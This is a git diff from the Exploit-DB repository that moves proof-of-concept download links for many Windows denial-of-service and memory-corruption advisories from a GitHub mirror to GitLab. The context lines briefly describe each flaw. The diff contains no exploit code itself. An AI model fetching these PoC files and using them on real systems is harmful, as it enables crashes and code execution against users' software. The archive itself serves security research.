01eb180f6..03afaa16d 100644 --- a/exploits/windows/dos/31363.txt +++ b/exploits/windows/dos/31363.txt @@ -4,4 +4,4 @@ Panda Internet Security/Antivirus+Firewall 2008 is prone to a vulnerability that Local users may exploit this vulnerability to cause a denial of service or to execute arbitrary code in the context of the kernel. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31363.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31363.rar \ No newline at end of file diff --git a/exploits/windows/dos/31381.txt b/exploits/windows/dos/31381.txt index 031dc14d4..df50dc597 100644 --- a/exploits/windows/dos/31381.txt +++ b/exploits/windows/dos/31381.txt @@ -4,4 +4,4 @@ Motorola Timbuktu Pro is prone to multiple denial-of-service vulnerabilities. Exploiting these issues will allow attackers to crash the affected application, denying further service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31381.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31381.zip \ No newline at end of file diff --git a/exploits/windows/dos/31399.txt b/exploits/windows/dos/31399.txt index 74654e5d8..217d3dc4f 100644 --- a/exploits/windows/dos/31399.txt +++ b/exploits/windows/dos/31399.txt @@ -7,4 +7,4 @@ McAfee Common Managemetn Agent 3.6.0.574 (Patch3) or earlier, McAfee Agent (MA) NOTE: This issue occurs only when the default debug level (7) is raised to 8. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31399.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31399.zip \ No newline at end of file diff --git a/exploits/windows/dos/31461.txt b/exploits/windows/dos/31461.txt index 723f07109..273450a8e 100644 --- a/exploits/windows/dos/31461.txt +++ b/exploits/windows/dos/31461.txt @@ -141,7 +141,7 @@ published as 'User release'. [1] http://www.postersw.com/. [2] http://www.coresecurity.com/system/files/attachments/2014/02/CORE-2014-0001-publish-it.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31461.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31461.zip 10. *About CoreLabs* diff --git a/exploits/windows/dos/31563.txt b/exploits/windows/dos/31563.txt index bbed94a57..c524dc80e 100644 --- a/exploits/windows/dos/31563.txt +++ b/exploits/windows/dos/31563.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to crash the application, resulting in denial SLMail Pro 6.3.1.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31563.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31563.zip \ No newline at end of file diff --git a/exploits/windows/dos/31629.txt b/exploits/windows/dos/31629.txt index 859189204..9dac86d62 100644 --- a/exploits/windows/dos/31629.txt +++ b/exploits/windows/dos/31629.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary Network Node Manager 7.53 running on Microsoft Windows is affected by this issue; other versions and platforms may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31629.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31629.zip \ No newline at end of file diff --git a/exploits/windows/dos/31696.txt b/exploits/windows/dos/31696.txt index d69476f0b..5dcf08b87 100644 --- a/exploits/windows/dos/31696.txt +++ b/exploits/windows/dos/31696.txt @@ -4,4 +4,4 @@ Computer Associates eTrust Secure Content Manager is prone to a remote denial-of An attacker can exploit this issue to crash the affected application, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31696.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31696.zip \ No newline at end of file diff --git a/exploits/windows/dos/31707.txt b/exploits/windows/dos/31707.txt index 28392d208..6297ba0c9 100644 --- a/exploits/windows/dos/31707.txt +++ b/exploits/windows/dos/31707.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this issue to cause denial-of-service conditions. CA ARCserve Backup 12.0.5454.0 is affected by this issue; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31707.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31707.zip \ No newline at end of file diff --git a/exploits/windows/dos/31899.txt b/exploits/windows/dos/31899.txt index 78056840e..20406fbde 100644 --- a/exploits/windows/dos/31899.txt +++ b/exploits/windows/dos/31899.txt @@ -76,4 +76,4 @@ libmpgatofixed32_plugin+0x00000000000016b4 (Hash=0xf1ffd179.0x98f1d37c) 176efdb4 000003e8 -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31899.avs \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31899.avs \ No newline at end of file diff --git a/exploits/windows/dos/31934.txt b/exploits/windows/dos/31934.txt index a9caaa9b0..0b351be2d 100644 --- a/exploits/windows/dos/31934.txt +++ b/exploits/windows/dos/31934.txt @@ -6,7 +6,7 @@ An attacker could exploit this issue by enticing a victim to open and interact w Successfully exploiting this issue will corrupt memory and crash the application. Given the nature of this issue, attackers may also be able to execute arbitrary code in the context of the currently logged-in user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31934-1.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31934-2.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31934-3.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31934-4.doc \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-1.doc +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-2.doc +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-3.doc +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-4.doc \ No newline at end of file diff --git a/exploits/windows/dos/32573.txt b/exploits/windows/dos/32573.txt index 95a82f49d..5ae611e9a 100644 --- a/exploits/windows/dos/32573.txt +++ b/exploits/windows/dos/32573.txt @@ -6,4 +6,4 @@ Attackers may exploit this issue to deny further service to legitimate users. This issue affects Windows 2003 and Windows Vista; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32573.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32573.zip \ No newline at end of file diff --git a/exploits/windows/dos/32939.txt b/exploits/windows/dos/32939.txt index bcb7ca097..239a6e3ea 100644 --- a/exploits/windows/dos/32939.txt +++ b/exploits/windows/dos/32939.txt @@ -6,4 +6,4 @@ Successfully exploits will crash the affected application, resulting in a denial OfficeScan 8.0 SP1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32939.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32939.zip \ No newline at end of file diff --git a/exploits/windows/dos/33056.pl b/exploits/windows/dos/33056.pl index 064f7025e..9752076ba 100755 --- a/exploits/windows/dos/33056.pl +++ b/exploits/windows/dos/33056.pl @@ -1,4 +1,4 @@ -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33056-sepm-secars-poc-v0.3.tar.gz +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33056-sepm-secars-poc-v0.3.tar.gz #!/usr/bin/perl -w # Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC diff --git a/exploits/windows/dos/33707.txt b/exploits/windows/dos/33707.txt index ad61bf72a..e8628516e 100644 --- a/exploits/windows/dos/33707.txt +++ b/exploits/windows/dos/33707.txt @@ -4,4 +4,4 @@ Orb Networks Orb is prone to a denial-of-service vulnerability when handling mal Successfully exploiting this issue allows remote attackers to deny service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33707.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33707.zip \ No newline at end of file diff --git a/exploits/windows/dos/33710.txt b/exploits/windows/dos/33710.txt index 0a4345cbc..30c4b62c1 100644 --- a/exploits/windows/dos/33710.txt +++ b/exploits/windows/dos/33710.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to execute arbitrary code in the context of th Media Jukebox 12 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33710.mp3 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33710.mp3 \ No newline at end of file diff --git a/exploits/windows/dos/33711.txt b/exploits/windows/dos/33711.txt index 130f00d42..5ed6148af 100644 --- a/exploits/windows/dos/33711.txt +++ b/exploits/windows/dos/33711.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to execute arbitrary code in the context of th BS.Player 2.51 Build 1022 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33711.mp3 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33711.mp3 \ No newline at end of file diff --git a/exploits/windows/dos/33770.txt b/exploits/windows/dos/33770.txt index 9be2a8d4b..5d9ab2ffb 100644 --- a/exploits/windows/dos/33770.txt +++ b/exploits/windows/dos/33770.txt @@ -8,4 +8,4 @@ Windows Media Player 11 is vulnerable; other versions may also be affected. UPDATE (Mar 19, 2010): The vendor has not been able to replicate this issue. Pending further investigation, this BID will be updated and possibly retired. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33770.avi.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33770.avi.gz \ No newline at end of file diff --git a/exploits/windows/dos/33849.txt b/exploits/windows/dos/33849.txt index 77dd66bc1..95073462c 100644 --- a/exploits/windows/dos/33849.txt +++ b/exploits/windows/dos/33849.txt @@ -6,4 +6,4 @@ Exploiting this issue will cause the server to copy data to a NULL pointer, whic netKar PRO 1.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33849.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33849.zip \ No newline at end of file diff --git a/exploits/windows/dos/33977.txt b/exploits/windows/dos/33977.txt index 7faf94092..1e1b6fac2 100644 --- a/exploits/windows/dos/33977.txt +++ b/exploits/windows/dos/33977.txt @@ -6,4 +6,4 @@ An attacker with valid login credentials can exploit these issues to cause the a Torque 2D game engine and Torque 3D game engine are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33977.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33977.zip \ No newline at end of file diff --git a/exploits/windows/dos/3399.txt b/exploits/windows/dos/3399.txt index e4452af24..b9ac29dc2 100644 --- a/exploits/windows/dos/3399.txt +++ b/exploits/windows/dos/3399.txt @@ -74,7 +74,7 @@ void new_warning(int index, const char *fmt, ...) { =========== http://aluigi.org/poc/netrekfs.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3399.zip (03022007-netrekfs.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3399.zip (03022007-netrekfs.zip) ####################################################################### diff --git a/exploits/windows/dos/34093.txt b/exploits/windows/dos/34093.txt index c6d14689e..0c875de78 100644 --- a/exploits/windows/dos/34093.txt +++ b/exploits/windows/dos/34093.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to cause the applications to become unrespo Battlefield 2 1.41 and Battlefield 2142 1.50 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34093.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34093.zip \ No newline at end of file diff --git a/exploits/windows/dos/34151.txt b/exploits/windows/dos/34151.txt index 0d7fcd901..4d6a11a31 100644 --- a/exploits/windows/dos/34151.txt +++ b/exploits/windows/dos/34151.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary code in the context of the Adobe SVG Viewer 3.03 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34151.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34151.rar \ No newline at end of file diff --git a/exploits/windows/dos/34158.txt b/exploits/windows/dos/34158.txt index a23f61eeb..05b33ddbf 100644 --- a/exploits/windows/dos/34158.txt +++ b/exploits/windows/dos/34158.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the affected server, resulting in de Chrome Engine version 4 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34158.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34158.zip \ No newline at end of file diff --git a/exploits/windows/dos/3419.txt b/exploits/windows/dos/3419.txt index 92a1bfd0b..48b689076 100644 --- a/exploits/windows/dos/3419.txt +++ b/exploits/windows/dos/3419.txt @@ -19,6 +19,6 @@ * Coded by Marsu * \*****************************************************************************/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3419.tar (03062007-Explorer_Crasher.tar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3419.tar (03062007-Explorer_Crasher.tar) # milw0rm.com [2007-03-06] \ No newline at end of file diff --git a/exploits/windows/dos/34227.txt b/exploits/windows/dos/34227.txt index 474f29ae7..8c1a6ef06 100644 --- a/exploits/windows/dos/34227.txt +++ b/exploits/windows/dos/34227.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to make the affected application unresponsive The issue affects Qt versions 4.6.3 and prior. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34227.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34227.zip \ No newline at end of file diff --git a/exploits/windows/dos/34251.txt b/exploits/windows/dos/34251.txt index 4cb123661..940b35902 100644 --- a/exploits/windows/dos/34251.txt +++ b/exploits/windows/dos/34251.txt @@ -11,4 +11,4 @@ Red Orchestra Darkest Hour: Europe '44-'45 Mare Nostrum -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34251.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34251.zip \ No newline at end of file diff --git a/exploits/windows/dos/34355.txt b/exploits/windows/dos/34355.txt index ffbc0a5c6..84d528391 100644 --- a/exploits/windows/dos/34355.txt +++ b/exploits/windows/dos/34355.txt @@ -4,4 +4,4 @@ Microsoft DirectX is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to interrupt existing sessions or crash or freeze the application that uses DirectX, resulting in denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34355.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34355.zip \ No newline at end of file diff --git a/exploits/windows/dos/34698.txt b/exploits/windows/dos/34698.txt index 51abef98a..b2b2103b3 100644 --- a/exploits/windows/dos/34698.txt +++ b/exploits/windows/dos/34698.txt @@ -4,4 +4,4 @@ Microsoft Excel is prone to a memory-corruption vulnerability. An attacker could exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34698.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34698.rar \ No newline at end of file diff --git a/exploits/windows/dos/35217.txt b/exploits/windows/dos/35217.txt index 1e85a63ee..0e3c8e7f2 100644 --- a/exploits/windows/dos/35217.txt +++ b/exploits/windows/dos/35217.txt @@ -48,4 +48,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5204.php PoC: - http://www.zeroscience.mk/codes/zsl_5204.rar - - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35217.rar \ No newline at end of file + - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35217.rar \ No newline at end of file diff --git a/exploits/windows/dos/35804.txt b/exploits/windows/dos/35804.txt index a63dc1326..a4b064759 100644 --- a/exploits/windows/dos/35804.txt +++ b/exploits/windows/dos/35804.txt @@ -8,4 +8,4 @@ NOTE: Remote code execution may be possible; however, this has not been confirme NetVault: SmartDisk versions 1.2.2 and prior are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35804.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35804.zip \ No newline at end of file diff --git a/exploits/windows/dos/35873.txt b/exploits/windows/dos/35873.txt index ef901771e..3945edd04 100644 --- a/exploits/windows/dos/35873.txt +++ b/exploits/windows/dos/35873.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the application, resulting in a deni Wireshark 1.4.5 is vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35873.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35873.pcap \ No newline at end of file diff --git a/exploits/windows/dos/35895.txt b/exploits/windows/dos/35895.txt index 45e3d42cb..62354f09a 100644 --- a/exploits/windows/dos/35895.txt +++ b/exploits/windows/dos/35895.txt @@ -6,7 +6,7 @@ Attackers can exploit this issue to cause the server to dereference an invalid m RealityServer Web Services 3.1.1 build 144525.5057 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35895.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35895.zip diff --git a/exploits/windows/dos/36128.txt b/exploits/windows/dos/36128.txt index f1b39c2cc..f5f38463a 100644 --- a/exploits/windows/dos/36128.txt +++ b/exploits/windows/dos/36128.txt @@ -6,4 +6,4 @@ Successful exploits may allow attackers to crash the affected application, denyi Wireshark 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36128.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36128.pcap \ No newline at end of file diff --git a/exploits/windows/dos/36211.txt b/exploits/windows/dos/36211.txt index 9facf9501..f9d833dd5 100644 --- a/exploits/windows/dos/36211.txt +++ b/exploits/windows/dos/36211.txt @@ -4,4 +4,4 @@ Microsoft Host Integration Server is prone to a remote denial-of-service vulnera An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36211.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36211.zip \ No newline at end of file diff --git a/exploits/windows/dos/36334.txt b/exploits/windows/dos/36334.txt index 00568075f..33b195ec9 100644 --- a/exploits/windows/dos/36334.txt +++ b/exploits/windows/dos/36334.txt @@ -63,7 +63,7 @@ An error when handling LZWMinimumCodeSize can be exploited to cause memory corru =========== http://protekresearchlab.com/exploits/PRL-2015-01.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36334.gif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36334.gif ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/36335.txt b/exploits/windows/dos/36335.txt index 5b68b437f..a350536f4 100644 --- a/exploits/windows/dos/36335.txt +++ b/exploits/windows/dos/36335.txt @@ -63,6 +63,6 @@ An error when handling the Size member of a GIF DataSubBlock data structure can =========== http://protekresearchlab.com/exploits/PRL-2015-02.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36335.gif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36335.gif ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/36336.txt b/exploits/windows/dos/36336.txt index d880caa15..69650b70f 100644 --- a/exploits/windows/dos/36336.txt +++ b/exploits/windows/dos/36336.txt @@ -67,7 +67,7 @@ An unspecified error in Windows Text Services can be exploited to cause memory c This file need to be open in wordpad. http://protekresearchlab.com/exploits/PRL-2015-03.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36336.rar +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36336.rar ############################################################################### Search for: \ No newline at end of file diff --git a/exploits/windows/dos/36405.txt b/exploits/windows/dos/36405.txt index 88d6cd775..291086700 100644 --- a/exploits/windows/dos/36405.txt +++ b/exploits/windows/dos/36405.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to perform denial-of-service attacks or gain Serv-U 11.1.0.3 and prior versions are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36405.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36405.zip \ No newline at end of file diff --git a/exploits/windows/dos/36443.txt b/exploits/windows/dos/36443.txt index 51ec68e5e..b459054f5 100644 --- a/exploits/windows/dos/36443.txt +++ b/exploits/windows/dos/36443.txt @@ -8,4 +8,4 @@ Note: The impact of the unspecified vulnerability is not known. We will update t Versions prior to Opera Web Browser 11.60 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36443.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36443.zip \ No newline at end of file diff --git a/exploits/windows/dos/36788.txt b/exploits/windows/dos/36788.txt index d6d25285f..0b31aeccc 100644 --- a/exploits/windows/dos/36788.txt +++ b/exploits/windows/dos/36788.txt @@ -64,4 +64,4 @@ Successful exploitation may allow execution of arbitrary code. =========== http://protekresearchlab.com/exploits/PRL-2015-04.docx -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36788.docx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36788.docx \ No newline at end of file diff --git a/exploits/windows/dos/3690.txt b/exploits/windows/dos/3690.txt index 95973bf97..0f78668b7 100644 --- a/exploits/windows/dos/3690.txt +++ b/exploits/windows/dos/3690.txt @@ -26,7 +26,7 @@ file613-1.doc - Word 2007 CPU exhaustion DOS + ding - CPU shoots up to 100 %, a These files can be found at http://www.offensive-security.com/0day/0day.tar.gz -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3690.tar.gz (04092007-0day.tar.gz) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3690.tar.gz (04092007-0day.tar.gz) Be safe, diff --git a/exploits/windows/dos/3693.txt b/exploits/windows/dos/3693.txt index cece935a2..ea112342e 100644 --- a/exploits/windows/dos/3693.txt +++ b/exploits/windows/dos/3693.txt @@ -1,5 +1,5 @@ MS Windows .HLP File Local HEAP Overflow PoC 0day -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3693.hlp.tgz (04092007-evil1.hlp.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3693.hlp.tgz (04092007-evil1.hlp.tgz) # milw0rm.com [2007-04-09] \ No newline at end of file diff --git a/exploits/windows/dos/37346.txt b/exploits/windows/dos/37346.txt index 918cb28f6..40b4ed5ad 100644 --- a/exploits/windows/dos/37346.txt +++ b/exploits/windows/dos/37346.txt @@ -69,6 +69,6 @@ An error when handling LZWMinimumCodeSize can be exploited to cause an heap memo =========== http://protekresearchlab.com/exploits/PRL-2015-06.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37346.gif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37346.gif ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/37347.txt b/exploits/windows/dos/37347.txt index 07e55e00b..f2472aafb 100644 --- a/exploits/windows/dos/37347.txt +++ b/exploits/windows/dos/37347.txt @@ -68,7 +68,7 @@ tricking a user into opening or previewing a malicious file. =========== http://protekresearchlab.com/exploits/PRL-2015-07.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37347.gif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37347.gif ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/37348.txt b/exploits/windows/dos/37348.txt index 4f583caed..a502beb49 100644 --- a/exploits/windows/dos/37348.txt +++ b/exploits/windows/dos/37348.txt @@ -66,6 +66,6 @@ tricking a user into opening or previewing a malicious file. =========== http://protekresearchlab.com/exploits/PRL-2015-08.png -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37348.png +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37348.png ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/37843.txt b/exploits/windows/dos/37843.txt index a167da170..110e60d53 100644 --- a/exploits/windows/dos/37843.txt +++ b/exploits/windows/dos/37843.txt @@ -51,4 +51,4 @@ So the idea is to use the rest argument to get a working poc. For example: Compile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37843.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37843.zip \ No newline at end of file diff --git a/exploits/windows/dos/37844.txt b/exploits/windows/dos/37844.txt index b91653b88..c1e77fd03 100644 --- a/exploits/windows/dos/37844.txt +++ b/exploits/windows/dos/37844.txt @@ -109,4 +109,4 @@ My mistake, not a UAF but instead a heap overflow. We allocate first 4*0x100000 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37844.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37844.zip \ No newline at end of file diff --git a/exploits/windows/dos/37845.txt b/exploits/windows/dos/37845.txt index 0148b2e3d..30f7647be 100644 --- a/exploits/windows/dos/37845.txt +++ b/exploits/windows/dos/37845.txt @@ -42,4 +42,4 @@ At first sight this looks to be an uninitialized stack variable but I might be w --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37845.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37845.zip \ No newline at end of file diff --git a/exploits/windows/dos/37846.txt b/exploits/windows/dos/37846.txt index ca1a8d24b..2e48ab7f2 100644 --- a/exploits/windows/dos/37846.txt +++ b/exploits/windows/dos/37846.txt @@ -60,4 +60,4 @@ Reading this data back is not straightforward. For a DefineBitsLossless tag, we --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37846.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37846.zip \ No newline at end of file diff --git a/exploits/windows/dos/37847.txt b/exploits/windows/dos/37847.txt index 1d7ac11f0..aff001aa4 100644 --- a/exploits/windows/dos/37847.txt +++ b/exploits/windows/dos/37847.txt @@ -144,4 +144,4 @@ var a = tfield.filters --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37847.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37847.zip \ No newline at end of file diff --git a/exploits/windows/dos/37848.txt b/exploits/windows/dos/37848.txt index 45740c543..198197624 100644 --- a/exploits/windows/dos/37848.txt +++ b/exploits/windows/dos/37848.txt @@ -139,4 +139,4 @@ tfield.filters = o --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37848.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37848.zip \ No newline at end of file diff --git a/exploits/windows/dos/37849.txt b/exploits/windows/dos/37849.txt index bff667852..abfb10f57 100644 --- a/exploits/windows/dos/37849.txt +++ b/exploits/windows/dos/37849.txt @@ -5,4 +5,4 @@ Credit is to KEEN Team. 3 different PoC's in the attached zip. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37849.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37849.zip \ No newline at end of file diff --git a/exploits/windows/dos/37853.txt b/exploits/windows/dos/37853.txt index 890b2ab51..c317bd2dc 100644 --- a/exploits/windows/dos/37853.txt +++ b/exploits/windows/dos/37853.txt @@ -141,4 +141,4 @@ bd.getPixel32(o,4) --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37853.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37853.zip \ 